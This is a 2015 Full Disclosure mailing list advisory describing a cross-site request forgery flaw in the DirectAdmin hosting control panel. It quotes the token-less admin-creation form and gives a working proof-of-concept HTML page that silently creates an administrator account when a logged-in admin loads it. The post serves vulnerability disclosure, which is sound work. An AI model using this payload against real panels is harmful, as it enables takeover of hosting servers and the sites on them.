[FD] DirectAdmin (1.44.3) CSRF Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] DirectAdmin (1.44.3) CSRF Vulnerability
- From: Necmettin COŞKUN <h@xxxxxxx>
- Date: Sat, 10 Oct 2015 19:49:06 +0300
<div><p># Title : DirectAdmin (1.44.3) CSRF Vulnerability<br /># Date : 10-10-2015<br /># Version : 1.43.3-1.44.3<br /># Author : @babayarisi http://ha.cker.io<br /># Vendor : http://www.directadmin.com/<br /># Download: http://www.directadmin.com/demo.html<br />=============================================================================<br /># info : DirectAdmin is a web-based hosting control panel.</p>
<p># As you can see, the original form doesn't include CSRF protection or any secret token.</p>
<pre>
<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>
<tr><td td class="listtitle" colspan=3 align=right><br /><input type=submit value="Submit"><br /></td></tr>
</form>
</pre>
<p>#POC</p>
<pre>
<html>
<head>
<title>POC</title>
</head>
<script language="javascript">
function yurudi(){
var adress ="www.demo.com";
var username="demo";
var email ="demo@xxxxxxxx";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
document.getElementById("resim").src=urlson;
}
</script>
<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC
</pre>
<p># don't be evil!</p></div>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/